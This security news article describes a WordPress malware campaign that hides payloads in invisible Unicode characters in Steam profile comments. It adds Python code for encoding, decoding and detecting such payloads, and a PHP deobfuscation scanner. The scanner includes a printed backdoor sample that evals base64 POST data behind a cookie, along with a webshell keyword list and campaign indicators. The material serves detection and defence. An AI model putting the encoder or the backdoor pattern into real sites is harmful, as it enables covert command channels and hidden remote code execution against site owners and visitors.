HackMyIP
2026-06-01 BleepingComputer

WordPress Malware Hides in Steam Profiles: 2,000 Sites Hit

Tags: Malware, Threat Intel

Security researchers at GoDaddy have uncovered a WordPress malware campaign that hides its command-and-control (C2) channel inside Steam Community profile comments. The operation, first observed in July 2025, has infected roughly 1,980 WordPress websites. By staging its encoded payloads on Valve's platform, the threat actor needs no dedicated C2 infrastructure, and the fetches look like ordinary requests to a high-reputation domain, which leaves network-based detection with little to work with. The initial infection vector is still under investigation; the researchers consider stolen admin credentials, compromised FTP/SFTP accounts, vulnerable WordPress themes or plugins, and a possible supply-chain compromise as candidates.

The attack chain begins with first-stage malware implanted on the compromised WordPress site. It queries specific Steam Community profiles and extracts the text of seemingly innocuous comments. Those comments carry the payload in six invisible Unicode code points: zero-width non-joiner (U+200C), zero-width joiner (U+200D), function application (U+2061), invisible times (U+2062), invisible separator (U+2063) and invisible plus (U+2064). GoDaddy's analysis shows that the decoder ignores the visible characters entirely: it maps each invisible character to a numerical value, converts those values to binary and reconstructs the payload bytes. "This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload," the researchers explained in their technical report.
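To make the carrier concrete, here is an added example (not GoDaddy's decoder and not the malware's own code) that round-trips bytes through the six invisible code points named above and, on the detection side, counts them in a piece of text. The report does not publish the value each code point maps to or the digit order, so the base-6, four-digits-per-byte mapping below is an assumption chosen for readability; the cover text and payload are constructed.

```python
"""Invisible-Unicode payload carrier: encoder, decoder and a detector for comment text."""
import math

# The six invisible code points named in the GoDaddy write-up, in the order used as digits 0..5.
INVISIBLE = "\u200c\u200d\u2061\u2062\u2063\u2064"
DIGIT = {ch: i for i, ch in enumerate(INVISIBLE)}
DIGITS_PER_BYTE = 4  # ASSUMED scheme: 6**4 = 1296 >= 256, so four base-6 digits carry one byte


def encode(payload: bytes, cover: str) -> str:
    """Hide `payload` in `cover` as base-6 digits spelled with invisible code points.

    `cover` must not itself contain any of the six code points, or decode() will read them.
    """
    digits = []
    for b in payload:
        for _ in range(DIGITS_PER_BYTE):  # least-significant digit first
            digits.append(INVISIBLE[b % 6])
            b //= 6
    if not cover:
        return "".join(digits)
    per_char = math.ceil(len(digits) / len(cover))
    out, pos = [], 0
    for ch in cover:  # spread the digit stream across the visible text as camouflage
        out.append(ch)
        out.append("".join(digits[pos:pos + per_char]))
        pos += per_char
    return "".join(out)


def decode(text: str) -> bytes:
    """Reverse of encode(): visible characters are ignored, only the invisible digits count."""
    digits = [DIGIT[ch] for ch in text if ch in DIGIT]
    if len(digits) % DIGITS_PER_BYTE:
        raise ValueError("invisible-digit stream is not byte aligned")
    out = bytearray()
    for i in range(0, len(digits), DIGITS_PER_BYTE):
        value = sum(d * 6 ** k for k, d in enumerate(digits[i:i + DIGITS_PER_BYTE]))
        if value > 255:
            raise ValueError("digit group does not fit in a byte")
        out.append(value)
    return bytes(out)


def scan(text: str, min_invisible: int = 16) -> dict:
    """Detection side: ordinary comments contain at most a handful of these code points."""
    by_code_point = {f"U+{ord(ch):04X}": text.count(ch) for ch in INVISIBLE}
    invisible = sum(by_code_point.values())
    return {
        "invisible": invisible,
        "visible": len(text) - invisible,
        "by_code_point": by_code_point,
        "flag": invisible >= min_invisible,
    }


if __name__ == "__main__":
    COVER = "gg wp, nice games last night"  # constructed cover text
    PAYLOAD = b"GET /asahi-jquery-min-bundle"  # constructed payload
    stego = encode(PAYLOAD, COVER)
    print("looks like:", repr(stego.encode("ascii", "ignore").decode()))  # the visible part only
    print("decodes to:", decode(stego))
    print("scan:", scan(stego))
```

Running `scan()` over scraped comment text, or over strings pulled from a site's database, gives a cheap first-pass indicator: a comment whose invisible-character count rivals its visible length is worth a closer look regardless of which mapping the real decoder uses.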

The decoded payload opens a connection to hello-mywordl[.]info, which serves JavaScript disguised as legitimate libraries under filenames such as asahi-jquery-min-bundle and lodash.core.min.js. That JavaScript is injected into every front-end page of a compromised site. The final stage is a backdoor that executes base64-encoded PHP code when it receives a specially crafted POST request carrying the authentication cookie "tEcaKKXesb". To evade detection, the malware hides strings behind octal and hex escape sequences, randomizes function names, includes fake, never-executed logging code, and uses standard WordPress API calls so that its activity resembles legitimate site behaviour. Site administrators should audit theme and plugin files for unexpected outbound requests to Steam domains (it is the server-side first stage, not a visitor's browser, that fetches the profile comments), compare every JavaScript file the site serves against the copies shipped with the installed themes and plugins, and search the codebase for the cookie name above; an unfamiliar script name such as asahi-jquery-min-bundle in page source is a strong indicator.
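The octal/hex string obfuscation described above is cheap to undo, and undoing it is exactly what turns a bland-looking PHP file into one full of obvious indicators. The following added example (not code from the report or the campaign) resolves PHP double-quoted-string escapes and reports which indicator tokens appear only after de-escaping; those are the ones someone went to the trouble of hiding. The two PHP snippets are constructed, inert samples for the scanner; the indicator list beyond the "tEcaKKXesb" cookie name is a generic webshell vocabulary, not something the report lists.

```python
"""Scanner for PHP strings hidden behind octal/hex escape sequences."""
import pathlib
import re

# PHP double-quoted-string escapes: "\x41" (hex, 1-2 digits) and "\101" (octal, 1-3 digits).
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

# "tEcaKKXesb" is the cookie name reported for this campaign; the rest are generic
# webshell building blocks (assumed list, not taken from the report).
INDICATORS = (
    "eval", "assert", "base64_decode", "create_function", "system", "shell_exec",
    "passthru", "preg_replace", "$_POST", "$_COOKIE", "$_REQUEST", "tEcaKKXesb",
)


def deobfuscate(src: str) -> str:
    """Resolve PHP hex/octal escapes to the characters they denote (PHP wraps octal > 255)."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, src)


def scan_php(src: str) -> dict:
    """Report indicators that surface only after de-escaping; those are the hidden ones."""
    decoded = deobfuscate(src)
    return {
        "escape_sequences": len(ESCAPE_RE.findall(src)),
        "visible_indicators": sorted(t for t in INDICATORS if t in src),
        "hidden_indicators": sorted(t for t in INDICATORS if t in decoded and t not in src),
        "suspicious": any(t in decoded and t not in src for t in INDICATORS),
    }


def scan_tree(root: str) -> list:
    """Walk a WordPress install (e.g. wp-content) and list files with hidden indicators."""
    hits = []
    for path in pathlib.Path(root).rglob("*.php"):
        try:
            result = scan_php(path.read_text(errors="replace"))
        except OSError:
            continue
        if result["suspicious"]:
            hits.append((str(path), result["hidden_indicators"]))
    return hits


# Constructed sample: escapes hide the cookie name, "eval" and "base64_decode".
SAMPLE_MALICIOUS = r'''<?php
function wp_cache_refresh_x91() {
    $c = "\x74\x45\x63\x61\x4b\x4b\x58\x65\x73\x62";
    $f = "\x65\x76\x61\x6c";
    $d = "\142\141\163\145\66\64\137\144\145\143\157\144\145";
    if (isset($_COOKIE[$c]) && isset($_POST["p"])) {
        $f($d($_POST["p"]));
    }
    if (false) { error_log("debug"); }  // fake, never-reached logging
}
'''

# Constructed clean sample: the escapes decode to harmless text.
SAMPLE_CLEAN = r'''<?php
$greeting = "\x48\x65\x6c\x6c\x6f";   // "Hello"
echo $greeting . " " . $_POST["name"];
'''

if __name__ == "__main__":
    print(scan_php(SAMPLE_MALICIOUS))
    print(scan_php(SAMPLE_CLEAN))
```

Escape resolution alone does not catch strings assembled with `chr()` or concatenation, so treat a clean result as "nothing obvious" rather than "clean"; the useful signal is a token that exists only in the decoded text, which legitimate plugin code almost never produces.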

Source: BleepingComputer
